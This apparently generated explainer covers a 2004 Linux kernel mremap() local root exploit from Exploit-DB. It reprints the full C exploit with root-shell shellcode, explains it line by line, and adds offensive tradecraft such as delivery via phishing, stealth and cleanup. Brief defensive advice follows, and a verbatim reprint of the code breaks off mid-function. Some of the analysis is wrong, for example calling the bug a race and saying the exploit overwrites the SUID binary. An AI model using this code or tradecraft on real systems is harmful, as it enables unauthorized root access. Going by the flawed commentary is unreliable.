Linux Kernel 2.2.25/2.4.24/2.6.2 'mremap()' Local Privilege Escalation Exploit Explained

Linux Kernel 2.2.25/2.4.24/2.6.2 'mremap()' Local Privilege Escalation Exploit Explained
What this paper is
This paper details a local privilege escalation vulnerability in specific versions of the Linux kernel. The vulnerability lies within the mremap() system call, which is used to remap memory regions. By exploiting a missing return value check in the kernel's handling of do_munmap (an internal function called by mremap), an attacker can manipulate memory mappings to gain elevated privileges, typically by overwriting a SUID (Set User ID) binary.
Simple technical breakdown
The core of the exploit is a race condition and a logic flaw within the mremap() system call. When mremap() is used to move a memory mapping, it internally calls do_munmap to unmap the old region. In vulnerable kernel versions, do_munmap might not properly check its return value. If do_munmap fails (e.g., due to an error in unmapping), mremap() continues as if it succeeded.
The exploit leverages this by:
- Setting up a target: It identifies a SUID binary (like
/bin/ping) that, when executed, grants root privileges. - Allocating memory: It maps a large number of memory pages to exhaust available Virtual Memory Areas (VMAs) and populate the page table cache. This is done to influence the kernel's memory management.
- Triggering the vulnerability: It uses
mremap()to move a memory region that contains the SUID binary's executable code. The goal is to cause an internal error during the unmapping phase ofmremap(). - Overwriting the SUID binary: Due to the unchecked
do_munmapreturn, themremap()call might proceed even if the original mapping wasn't properly unmapped. This allows the exploit to overwrite the SUID binary's memory with its own shellcode. - Gaining root: When the SUID binary is later executed by a user, it will instead execute the injected shellcode, which is designed to grant a root shell.
Complete code and payload walkthrough
The provided C code implements the exploit. Let's break it down section by section.
/*
*
* mremap missing do_munmap return check kernel exploit
*
* gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
* ./mremap_pte [suid] [[shell]]
*
* Vulnerable kernel versions are all <= 2.2.25, <= 2.4.24 and <= 2.6.2
*
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/- Purpose: This is the header comment. It states the exploit's purpose (mremap missing do_munmap return check), compilation instructions (
gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte), usage (./mremap_pte [suid] [[shell]]), vulnerable kernel versions, copyright, and a disclaimer.
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <asm/page.h>- Purpose: These are standard C include files providing definitions for input/output, memory allocation, error handling, system calls, signals, time, scheduling, memory mapping, process waiting, system information, and architecture-specific page definitions.
#define str(s) #s
#define xstr(s) str(s)
// this is for standard kernels with 3/1 split
#define STARTADDR 0x40000000
#define PGD_SIZE (PAGE_SIZE * 1024)
#define VICTIM (STARTADDR + PGD_SIZE)
#define MMAP_BASE (STARTADDR + 3*PGD_SIZE)
#define DSIGNAL SIGCHLD
#define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM)
#define MREMAP_MAYMOVE ( (1UL) << 0 )
#define MREMAP_FIXED ( (1UL) << 1 )
#define __NR_sys_mremap __NR_mremap- Purpose: These are preprocessor macros.
str(s)andxstr(s): Used to stringify preprocessor tokens, useful for embedding system call numbers into assembly code.STARTADDR,PGD_SIZE,VICTIM,MMAP_BASE: Define memory addresses and sizes for memory mapping operations.STARTADDRis a base address,PGD_SIZEis the size of a Page Global Directory,VICTIMis a target address for memory operations, andMMAP_BASEis another base address for mapping.DSIGNAL,CLONEFL: Define signal and flags for theclone()system call, used to create new processes.CLONE_VFORKandCLONE_VMare important flags for shared memory and process state.MREMAP_MAYMOVE,MREMAP_FIXED: Define flags for themremap()system call.MREMAP_MAYMOVEallows the kernel to move the mapping, andMREMAP_FIXEDrequires the mapping to be at a specific address.__NR_sys_mremap: Defines the system call number formremap.
// how many ld.so pages? this is the .text section length (like cat
// /proc/self/maps) in pages
#define LINKERPAGES 0x14- Purpose:
LINKERPAGESis an estimate for the number of pages occupied by the dynamic linker's.textsection. This is used to determine the size of memory regions to manipulate.
// suid victim
static char *suid="/bin/ping";
// shell to start
static char *launch="/bin/bash";- Purpose:
suidandlaunchare global variables storing the default path to a SUID binary (e.g.,/bin/ping) and the desired shell to execute (e.g.,/bin/bash). These can be overridden by command-line arguments.
_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,
ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
unsigned long new_len, unsigned long flags,
unsigned long new_addr);- Purpose: This defines a custom wrapper for the
sys_mremapsystem call. The_syscall5macro (likely from a custom header or defined elsewhere) is used to declare a system call with 5 arguments. The subsequent declaration provides the function signature forsys_mremap.
static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;
static int i, pid=0;
static char *env[2], *argv[2];
static ulong ret;- Purpose: These are global variables used throughout the exploit:
base: A memory address used in mapping operations.t: A pointer to unsigned integers, used for memory manipulation.cnt: A counter, likely for tracking memory mapping operations.old_esp: Stores the stack pointer (ESP) at the time of execution.prot: Stores memory protection flags.victim: Stores the target address for memory operations.i: A loop counter.pid: Stores the process ID of a child process created byclone().env,argv: Arrays to hold environment variables and command-line arguments forexecve.ret: Stores the return value of system calls.
// code to appear inside the suid image
static void suid_code(void)
{
__asm__(
" call callme \n"
// setresuid(0, 0, 0), setresgid(0, 0, 0)
"jumpme: xorl %ebx, %ebx \n"
" xorl %ecx, %ecx \n"
" xorl %edx, %edx \n"
" xorl %eax, %eax \n"
" mov $"xstr(__NR_setresuid)", %al \n"
" int $0x80 \n"
" mov $"xstr(__NR_setresgid)", %al \n"
" int $0x80 \n"
// execve(launch)
" popl %ebx \n"
" andl $0xfffff000, %ebx \n"
" xorl %eax, %eax \n"
" pushl %eax \n"
" movl %esp, %edx \n"
" pushl %ebx \n"
" movl %esp, %ecx \n"
" mov $"xstr(__NR_execve)", %al \n"
" int $0x80 \n"
// exit
" xorl %eax, %eax \n"
" mov $"xstr(__NR_exit)", %al \n"
" int $0x80 \n"
"callme: jmp jumpme \n"
);
}- Purpose: This is the shellcode that will be injected into the SUID binary. It's written in x86 assembly.
call callme: Jumps tocallmeto set up the stack for the subsequent code.jumpme:: This label marks the entry point for the main part of the shellcode.xorl %ebx, %ebx,xorl %ecx, %ecx,xorl %edx, %edx,xorl %eax, %eax: These instructions zero out registers.mov $"xstr(__NR_setresuid)", %al: Loads the system call number forsetresuidinto thealregister (lower 8 bits ofeax).int $0x80: Triggers a system call. This call effectively becomessetresuid(0, 0, 0), setting the real, effective, and saved user IDs to 0 (root).mov $"xstr(__NR_setresgid)", %al: Loads the system call number forsetresgidintoal.int $0x80: Triggerssetresgid(0, 0, 0), setting all real, effective, and saved group IDs to 0 (root).popl %ebx: Pops a value from the stack intoebx. This value is the address of thelaunchstring (e.g.,/bin/bash).andl $0xfffff000, %ebx: Aligns the address inebxto a page boundary.xorl %eax, %eax: Zeros outeax.pushl %eax: Pushes a null terminator onto the stack (for theargvarray).movl %esp, %edx: Setsedxto point to the null terminator (end ofargv).pushl %ebx: Pushes the address of thelaunchstring onto the stack (this will beargv[0]).movl %esp, %ecx: Setsecxto point to the beginning of theargvarray on the stack.mov $"xstr(__NR_execve)", %al: Loads the system call number forexecveintoal.int $0x80: Triggersexecve(launch, argv, env). Sinceargvis set up to point to thelaunchstring andenvis null, this executes the specified shell (e.g.,/bin/bash) as root.xorl %eax, %eax,mov $"xstr(__NR_exit)", %al,int $0x80: Ifexecvefails, this sequence callsexit(0).callme: jmp jumpme: This is a jump target for the initialcall. It effectively makescallmejump tojumpme, ensuring the shellcode starts execution correctly.
static int suid_code_end(int v)
{
return v+1;
}- Purpose: This is a dummy function used to determine the end address of the
suid_codeassembly block. The difference betweensuid_code_endandsuid_codegives the size of the shellcode.
static inline void get_esp(void)
{
__asm__(
" movl %%esp, %%eax \n"
" andl $0xfffff000, %%eax \n"
" movl %%eax, %0 \n"
: : "m"(old_esp)
);
}- Purpose: This inline assembly function retrieves the current stack pointer (
ESP), aligns it to a page boundary, and stores it in theold_espglobal variable. This is crucial for later memory manipulation.
static inline void cloneme(void)
{
__asm__(
" pusha \n"
" movl $("xstr(CLONEFL)"), %%ebx \n"
" movl %%esp, %%ecx \n"
" movl $"xstr(__NR_clone)", %%eax \n"
" int $0x80 \n"
" movl %%eax, %0 \n"
" popa \n"
: : "m"(pid)
);
}- Purpose: This inline assembly function calls the
clone()system call.pusha: Pushes all general-purpose registers onto the stack.movl $("xstr(CLONEFL)"), %%ebx: Loads theCLONEFLflags (which includeSIGCHLD,CLONE_VFORK,CLONE_VM) intoebx. These flags are important for creating a child process that shares memory with the parent and stops execution until the child exits.movl %%esp, %%ecx: Moves the current stack pointer intoecx. This is the argument for the child's stack.movl $"xstr(__NR_clone)", %%eax: Loads the system call number forcloneintoeax.int $0x80: Executes theclone()system call.movl %%eax, %0: The return value ofclone()(the child's PID if successful, or 0 in the child) is stored in thepidglobal variable.popa: Restores the general-purpose registers.
static inline void my_execve(void)
{
__asm__(
" movl %1, %%ebx \n"
" movl %2, %%ecx \n"
" movl %3, %%edx \n"
" movl $"xstr(__NR_execve)", %%eax \n"
" int $0x80 \n"
: "=a"(ret)
: "m"(suid), "m"(argv), "m"(env)
);
}- Purpose: This inline assembly function executes the
execve()system call with thesuidpath,argv, andenvvariables. It's a direct wrapper forexecve. The output is stored inret.
static inline void pte_populate(unsigned addr)
{
unsigned r;
char *ptr;
memset((void*)addr, 0x90, PAGE_SIZE); // Fill page with NOPs
r = ((unsigned)suid_code_end) - ((unsigned)suid_code); // Calculate shellcode size
ptr = (void*) (addr + PAGE_SIZE); // Start from the end of the page
ptr -= r+1; // Move back to make space for shellcode
memcpy(ptr, suid_code, r); // Copy shellcode
memcpy((void*)addr, launch, strlen(launch)+1); // Copy launch string (e.g., /bin/bash) to the beginning of the page
}- Purpose: This function prepares a memory page to hold the shellcode and the
launchstring.memset((void*)addr, 0x90, PAGE_SIZE);: Fills the entire target page with NOP (No Operation) instructions. This is a common technique to provide a buffer of executable code that does nothing until the actual shellcode is reached.r = ((unsigned)suid_code_end) - ((unsigned)suid_code);: Calculates the size of thesuid_codeassembly block.ptr = (void*) (addr + PAGE_SIZE); ptr -= r+1;: Calculates an address within the page to place the shellcode, typically near the end.memcpy(ptr, suid_code, r);: Copies the actual shellcode into the calculated position.memcpy((void*)addr, launch, strlen(launch)+1);: Copies the path to the shell (e.g.,/bin/bash) to the beginning of the page. This string will be used asargv[0]by theexecvecall within the shellcode.
// hit VMA limit & populate PTEs
static void exhaust(void)
{
// mmap PTE donor
t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED==t)
goto failed;
// prepare shell code pages
for(i=2; i<LINKERPAGES+1; i++)
pte_populate(victim + PAGE_SIZE*i);
i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);
if(i)
goto failed;
// lock unmap
base = MMAP_BASE;
cnt = 0;
prot = PROT_READ;
printf("\n"); fflush(stdout);
for(;;) {
t = mmap((void*)base, PAGE_SIZE, prot,
MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);
if(MAP_FAILED==t) {
if(ENOMEM==errno)
break; // Exhausted memory, break loop
else
goto failed; // Other error
}
if( !(cnt%512) || cnt>65520 )
printf("\r MMAP #%d 0x%.8x - 0x%.8lx", cnt, base,
base+PAGE_SIZE); fflush(stdout);
base += PAGE_SIZE;
prot ^= PROT_EXEC; // Toggle execute permission
cnt++;
}
// move PTEs & populate page table cache
ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE,
MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);
if(-1==ret)
goto failed;
munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);
t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE,
PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0,
0);
if(MAP_FAILED==t)
goto failed;
*t = *((unsigned *)old_esp); // Copy the original ESP value
munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));
printf("\n[+] Success\n\n"); fflush(stdout);
return;
failed:
printf("\n[-] Failed\n"); fflush(stdout);
_exit(0);
}- Purpose: This is the core function that orchestrates the exploit by manipulating memory mappings to trigger the vulnerability.
t = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);: This maps a region of memory starting atVICTIMto hold data that will be used to populate page tables.LINKERPAGES+3pages are allocated.MAP_FIXEDmeans it must be mapped at the specified address.for(i=2; i<LINKERPAGES+1; i++) pte_populate(victim + PAGE_SIZE*i);: This loop callspte_populatefor several pages within thevictimregion. This prepares pages that will contain the shellcode and thelaunchstring, effectively placing executable code and data into memory that the kernel will later manage.i = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ);: This changes the protection of the mapped region to read-only. This might be to set up specific memory attributes before the main exploitation phase.- The second
for(;;)loop: This loop is designed to exhaust available memory by repeatedly callingmmapwithMAP_FIXEDat increasing addresses starting fromMMAP_BASE. It toggles theprot(protection) flag betweenPROT_READandPROT_EXEC. This process fills up the kernel's page table cache and VMAs, creating a specific memory state. The loop breaks whenmmapreturnsMAP_FAILEDwithENOMEM(out of memory), indicating that memory is exhausted. ret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE, MREMAP_FIXED|MREMAP_MAYMOVE, VICTIM);: This is the criticalmremap()call. It attempts to remap a region starting atvictim+PAGE_SIZE(which contains prepared shellcode/data) to a new size ofPAGE_SIZEat the addressVICTIM. The flagsMREMAP_FIXED|MREMAP_MAYMOVEare used. The vulnerability is that if the internaldo_munmapfails during this operation, themremapcall might still succeed, leading to memory corruption. The exploit relies on this failure to overwrite parts of the kernel's memory management structures.munmap((void*)MMAP_BASE, old_esp-MMAP_BASE);: This unmaps a large region of memory that was previously mapped during the exhaustion phase.t = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0);: This maps a new page at an address derived from the original stack pointer (old_esp).*t = *((unsigned *)old_esp);: This copies the original stack pointer value into the newly mapped page. This might be to preserve or manipulate a critical address.munmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE));: Another unmapping operation, likely to clean up or adjust memory regions.failed:label: If anymmap,mprotect, orsys_mremapcall fails critically, execution jumps here, prints an error, and exits.
static inline void check_kver(void)
{
static struct utsname un;
int a=0, b=0, c=0, v=0, e=0, n;
uname(&un); // Get kernel version information
n=sscanf(un.release, "%d.%d.%d", &a, &b, &c); // Parse version string (e.g., "2.4.20")
if(n!=3 || a!=2) { // Check if parsing was successful and major version is 2
printf("\n[-] invalid kernel version string\n");
_exit(0);
}
// Logic to determine if the kernel version is vulnerable and exploitable
if(b==2) { // Kernel 2.2.x
if(c<=25)
v=1; // Vulnerable
}
else if(b==3) { // Kernel 2.3.x (this part seems to have a typo, likely meant 2.4.x or 2.6.x based on context)
if(c<=99) // Assuming this refers to 2.3.x or a broader range
v=1;
}
else if(b==4) { // Kernel 2.4.x
if(c>18 && c<=24) // Specific range for 2.4.19 to 2.4.24
v=1, e=1; // Vulnerable and exploitable
else if(c>24) // 2.4.25+
v=0, e=0; // Not vulnerable
else // 2.4.0 to 2.4.18
v=1, e=0; // Vulnerable but maybe not fully exploitable in the same way
}
else if(b==5 && c<=75) // Kernel 2.5.x (likely a typo, should be 2.6.x)
v=1, e=1; // Vulnerable and exploitable
else if(b==6 && c<=2) // Kernel 2.6.x
v=1, e=1; // Vulnerable and exploitable
printf("\n[+] kernel %s vulnerable: %s exploitable %s",
un.release, v? "YES" : "NO", e? "YES" : "NO" );
fflush(stdout);
if(v && e) // If vulnerable and exploitable, continue
return;
_exit(0); // Otherwise, exit
}- Purpose: This function checks the running kernel version to ensure it's within the vulnerable range.
uname(&un);: Fills autsnamestructure with system information, including the kernel release string.sscanf(un.release, "%d.%d.%d", &a, &b, &c);: Parses the kernel release string (e.g., "2.4.20") into integer componentsa(major),b(minor), andc(patch level).- The
ifconditions then check these components against the known vulnerable versions:<= 2.2.25<= 2.4.24<= 2.6.2
- It sets
vto 1 if the kernel is vulnerable andeto 1 if it's considered "exploitable" (meaning the specific technique used in this exploit is likely to work). - If the kernel is not both vulnerable and exploitable according to its checks, the program exits.
int main(int ac, char **av)
{
// prepare
check_kver(); // Check kernel version first
memset(env, 0, sizeof(env));
memset(argv, 0, sizeof(argv));
if(ac>1) suid=av[1]; // Override default SUID binary if provided
if(ac>2) launch=av[2]; // Override default shell if provided
argv[0] = suid; // Set argv[0] for the execve call
get_esp(); // Get the initial stack pointer
// mmap & clone & execve
exhaust(); // Perform memory mapping and exhaustion to set up exploit conditions
cloneme(); // Clone the process
if(!pid) { // If this is the child process (pid is 0)
my_execve(); // Execute the SUID binary
} else { // If this is the parent process (pid > 0)
waitpid(pid, 0, 0); // Wait for the child process to finish
}
return 0;
}- Purpose: This is the main function that orchestrates the exploit execution.
check_kver();: Calls the kernel version check function.memset(env, 0, sizeof(env)); memset(argv, 0, sizeof(argv));: Initializes theenvandargvarrays to null.if(ac>1) suid=av[1]; if(ac>2) launch=av[2];: Allows the user to specify a different SUID binary and shell via command-line arguments.argv[0] = suid;: Sets the first argument for theexecvecall to the path of the SUID binary.get_esp();: Captures the initial stack pointer.exhaust();: Calls the function to perform the memory mapping and exhaustion, setting up the kernel state for the exploit.cloneme();: Creates a child process usingclone(). This is done so that the parent can wait for the child to execute the SUID binary, while the child performs the actual execution.if(!pid) { my_execve(); } else { waitpid(pid, 0, 0); }: This is the standard fork/exec pattern. Ifpidis 0, it means this is the child process, and it callsmy_execve()to execute the SUID binary. Ifpidis greater than 0, it means this is the parent process, and it waits for the child to complete usingwaitpid().
Code Fragment/Block -> Practical Purpose Mapping:
#include <stdio.h>, #include <stdlib.h>, etc.-> Standard Library Includes: Provides necessary functions for I/O, memory management, system calls, etc.#define STARTADDR, #define PGD_SIZE, etc.-> Memory Address Definitions: Defines key memory regions and sizes used for mapping and manipulation.#define MREMAP_MAYMOVE, #define MREMAP_FIXED-> mremap Flags: Specifies how themremapsystem call should behave.static char *suid="/bin/ping"; static char *launch="/bin/bash";-> Default Targets: Sets default paths for the SUID binary and the shell to launch._syscall5(ulong, sys_mremap, ...)-> System Call Declaration: Declares thesys_mremapsystem call for use.static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;-> Global Variables: Holds state information for the exploit, such as memory addresses, counters, and stack pointers.static void suid_code(void)-> Shellcode Definition: Contains the x86 assembly code that will be injected and executed to gain root privileges.static int suid_code_end(int v)-> Shellcode End Marker: Used to calculate the size of thesuid_codeassembly.static inline void get_esp(void)-> Stack Pointer Capture: Retrieves and stores the current stack pointer, aligned to a page.static inline void cloneme(void)-> Process Cloning: Uses theclone()system call to create a child process.static inline void my_execve(void)-> Execve Wrapper: A helper function to execute theexecve()system call.static inline void pte_populate(unsigned addr)-> Page Preparation: Fills a memory page with NOPs, copies shellcode, and the launch string.static void exhaust(void)-> Memory Exhaustion & Vulnerability Trigger: Maps numerous pages to exhaust VMAs, then usesmremapto trigger the kernel vulnerability.static inline void check_kver(void)-> Kernel Version Check: Verifies if the running kernel is within the vulnerable version range.int main(int ac, char **av)-> Main Execution Flow: Orchestrates the entire exploit, from version checking to memory manipulation and process execution.
Shellcode/Payload Segments:
The primary payload is the suid_code assembly function. It's executed after being injected into a SUID binary.
Stage 1: Privilege Escalation (setresuid/setresgid)
- Code:
jumpme: xorl %ebx, %ebx xorl %ecx, %ecx xorl %edx, %edx xorl %eax, %eax mov $"xstr(__NR_setresuid)", %al int $0x80 mov $"xstr(__NR_setresgid)", %al int $0x80 - Purpose: This segment calls
setresuid(0, 0, 0)andsetresgid(0, 0, 0). This effectively changes the real, effective, and saved user and group IDs of the current process to root (0). This is the primary privilege escalation step.
- Code:
Stage 2: Execution of Target Shell (execve)
- Code:
popl %ebx // Get address of launch string (e.g., /bin/bash) andl $0xfffff000, %ebx // Align to page boundary xorl %eax, %eax // Zero eax pushl %eax // Push null terminator for argv movl %esp, %edx // edx points to end of argv pushl %ebx // Push launch string address as argv[0] movl %esp, %ecx // ecx points to start of argv mov $"xstr(__NR_execve)", %al // syscall number for execve int $0x80 // Execute the shell - Purpose: This segment prepares the arguments for the
execve()system call and then invokes it. It retrieves the address of thelaunchstring (e.g.,/bin/bash) from the stack, sets up theargvarray on the stack (with the launch string asargv[0]and a null terminator), and then callsexecve. This replaces the current process with the specified shell, now running with root privileges.
- Code:
Stage 3: Exit (if execve fails)
- Code:
xorl %eax, %eax // Zero eax mov $"xstr(__NR_exit)", %al // syscall number for exit int $0x80 // Exit the process - Purpose: If the
execve()call fails for any reason, this segment ensures the process exits cleanly with a status of 0.
- Code:
Stage 4: Jump Target
- Code:
callme: jmp jumpme - Purpose: This is a small jump instruction used to correctly set up the initial execution flow. The
suid_codefunction begins withcall callme, which pushes the address of the instruction aftercallmeonto the stack and then jumps tocallme.callmethen jumps tojumpme, which is the actual start of the shellcode. This mechanism ensures that whenpopl %ebxis executed in Stage 2, it pops the correct return address (the address of thelaunchstring, which was pushed onto the stack by thecallinstruction's return address mechanism).
- Code:
Practical details for offensive operations teams
- Required Access Level: Local user access. The exploit runs as a standard user and aims to escalate privileges to root.
- Lab Preconditions:
- A Linux system running one of the vulnerable kernel versions (e.g., 2.2.25, 2.4.24, 2.6.2).
- The target system must have a SUID binary (like
/bin/pingor/usr/bin/su) that is not heavily protected or monitored. - The user must have write permissions in a directory where the exploit binary can be saved and executed.
- Sufficient memory available for the
mmapoperations.
- Tooling Assumptions:
- A C compiler (like GCC) is available on the target or can be used to cross-compile the exploit.
- Standard Linux utilities (
/bin/ping,/bin/bash, etc.) are present. - The exploit binary itself (
mremap_pte).
- Execution Pitfalls:
- Kernel Version Mismatch: The exploit will exit if the kernel version is not within the specified vulnerable range.
- Memory Availability: If the system is severely memory-constrained, the
mmapoperations might fail, preventing the exploit from proceeding. - SUID Binary Integrity: If the target SUID binary has been modified or is not present, the exploit might fail or execute unintended code.
- Race Conditions: While this exploit targets a specific race condition in
mremap, other system activities could potentially interfere, though it's less likely to cause a complete failure than a simple crash. - Address Space Layout Randomization (ASLR): While ASLR wasn't as prevalent or as strong in the era of these kernels, it could theoretically complicate memory address prediction if enabled. However, the exploit relies on predictable kernel memory layout for its operations.
- SELinux/AppArmor: If these security modules are in place and configured to restrict memory mapping or SUID execution, they could prevent the exploit from succeeding.
- Kernel Hardening: Modern kernels have many protections against this type of memory corruption and privilege escalation.
- Tradecraft Considerations:
- Stealth: Running this exploit can be noisy due to extensive
mmapcalls and potential error messages. It's best used in controlled environments or during specific phases of an engagement where noise is less of a concern. - Payload Delivery: The exploit binary needs to be delivered to the target. This can be done via phishing, social engineering, or by leveraging another vulnerability to gain initial access.
- Post-Exploitation: After gaining root, the attacker should clean up the exploit binary and any associated files. The injected shellcode will execute the chosen shell, providing a root shell.
- SUID Binary Choice: While
/bin/pingis a common example, other SUID binaries could be targeted. The choice might depend on what is available and what is least likely to be monitored.
- Stealth: Running this exploit can be noisy due to extensive
- Expected Telemetry:
- Process Execution: Creation of the
mremap_pteprocess. - System Calls: A high volume of
mmap,mprotect,munmap,mremap,clone,waitpid, andexecvesystem calls. - Memory Usage: Significant increase in memory allocation and usage.
- SUID Binary Execution: The execution of the target SUID binary (e.g.,
/bin/ping) will be observed, but it will be followed by the execution of/bin/bash(or the chosen shell) with root privileges. - Kernel Logs: Potential kernel panics or error messages if the exploit triggers unexpected behavior or if defenses are in place.
- File System Activity: Creation and deletion of the exploit binary.
- Process Execution: Creation of the
Where this was used and when
This exploit was published in March 2004 by iSEC Security Research. It targeted specific, older versions of the Linux kernel (2.2.25, 2.4.24, and 2.6.2). Exploits of this nature were common in the early to mid-2000s as kernel memory management and security features were less mature. While it's unlikely to be directly effective against modern, patched Linux systems, it represents a significant historical vulnerability that informed the development of more robust kernel security. Its usage would have been limited to systems running these specific, outdated kernel versions, likely in research, development, or legacy environments.
Defensive lessons for modern teams
- Kernel Patching: The most crucial defense is to keep the kernel updated. This exploit targets known vulnerabilities that have long been patched.
- System Call Auditing: Monitoring for unusual or excessive use of system calls like
mremap,mmap, andmprotectcan help detect exploitation attempts. - Memory Protection: Modern kernels have stronger memory protection mechanisms, including more robust checks within system calls and better management of VMAs.
- SUID Binary Security: Limiting the number of SUID binaries and carefully auditing their permissions and integrity is essential. Tools like
find / -perm -4000 -type fcan list SUID binaries. - Intrusion Detection Systems (IDS): Network and host-based IDS can be configured to detect patterns of suspicious system call activity or known exploit signatures.
- Security Modules: SELinux and AppArmor can significantly restrict what processes can do, even if they achieve privilege escalation, by enforcing mandatory access control policies.
- Principle of Least Privilege: Users and processes should only have the minimum privileges necessary to perform their functions, reducing the impact of any successful privilege escalation.
ASCII visual (if applicable)
This exploit's core mechanism involves manipulating kernel memory management structures. A simplified visual representation of the memory mapping and remapping process can be helpful.
+-----------------+ +-----------------+ +-----------------+
| Initial Memory | | After mmap | | After mremap |
| Mapping (VMA1) |----->| (VMA1 unmapped, |----->| (VMA1 moved/ |
| | | VMA2 created) | | corrupted, |
+-----------------+ +-----------------+ | VMA3 created) |
+-----------------+
^
|
| Vulnerable
| mremap()
| with bad
| do_munmap
| return checkExplanation:
- Initial Memory Mapping: A region of memory is mapped.
- After
mmap(and preparation): The exploit usesmmapextensively to prepare pages and potentially exhaust memory. This creates new VMAs. - After
mremap: Themremapcall attempts to move or resize a memory region. In the vulnerable kernel, ifdo_munmap(which unmaps the old region) fails internally, themremapmight proceed. This can lead to:- The original memory region not being properly unmapped.
- A new mapping being created or an existing one being corrupted.
- The exploit's shellcode being placed where the SUID binary's code should be.
This diagram is a high-level abstraction. The actual exploit involves intricate manipulation of page tables (PTs) and page directory entries (PDEs) by carefully crafted mmap and mremap calls.
Source references
- Paper ID: 160
- Paper Title: Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Local Privilege Escalation
- Author: Paul Starzetz
- Published: 2004-03-01
- Keywords: Linux, local
- Paper URL: https://www.exploit-db.com/papers/160
- Raw URL: https://www.exploit-db.com/raw/160
Original Exploit-DB Content (Verbatim)
/*
*
* mremap missing do_munmap return check kernel exploit
*
* gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte
* ./mremap_pte [suid] [[shell]]
*
* Vulnerable kernel versions are all <= 2.2.25, <= 2.4.24 and <= 2.6.2
*
* Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <syscall.h>
#include <signal.h>
#include <time.h>
#include <sched.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/utsname.h>
#include <asm/page.h>
#define str(s) #s
#define xstr(s) str(s)
// this is for standard kernels with 3/1 split
#define STARTADDR 0x40000000
#define PGD_SIZE (PAGE_SIZE * 1024)
#define VICTIM (STARTADDR + PGD_SIZE)
#define MMAP_BASE (STARTADDR + 3*PGD_SIZE)
#define DSIGNAL SIGCHLD
#define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM)
#define MREMAP_MAYMOVE ( (1UL) << 0 )
#define MREMAP_FIXED ( (1UL) << 1 )
#define __NR_sys_mremap __NR_mremap
// how many ld.so pages? this is the .text section length (like cat
// /proc/self/maps) in pages
#define LINKERPAGES 0x14
// suid victim
static char *suid="/bin/ping";
// shell to start
static char *launch="/bin/bash";
_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d,
ulong, e);
unsigned long sys_mremap(unsigned long addr, unsigned long old_len,
unsigned long new_len, unsigned long flags,
unsigned long new_addr);
static volatile unsigned base, *t, cnt, old_esp, prot, victim=0;
static int i, pid=0;
static char *env[2], *argv[2];
static ulong ret;
// code to appear inside the suid image
static void suid_code(void)
{
__asm__(
" call callme \n"
// setresuid(0, 0, 0), setresgid(0, 0, 0)
"jumpme: xorl %ebx, %ebx \n"
" xorl %ecx, %ecx \n"
" xorl %edx, %edx \n"
" xorl %eax, %eax \n"
" mov $"xstr(__NR_setresuid)", %al \n"
" int $0x80 \n"
" mov $"xstr(__NR_setresgid)", %al \n"
" int $0x80 \n"
// execve(launch)
" popl %ebx \n"
" andl $0xfffff000, %ebx \n"
" xorl %eax, %eax \n"
" pushl %eax \n"
" movl %esp, %edx \n"
" pushl %ebx \n"
" movl %esp, %ecx \n"
" mov $"xstr(__NR_execve)", %al \n"
" int $0x80 \n"
// exit
" xorl %eax, %eax \n"
" mov $"xstr(__NR_exit)", %al \n"
" int $0x80 \n"
"callme: jmp jumpme \n"
);
}
static int suid_code_end(int v)
{
return v+1;
}
static inline void get_esp(void)
{
__asm__(
" movl %%esp, %%eax \n"
" andl $0xfffff000, %%eax \n"
" movl %%eax, %0 \n"
: : "m"(old_esp)
);
}
static inline void cloneme(void)
{
__asm__(
" pusha \n"
" movl $("xstr(CLONEFL)"), %%ebx \n"
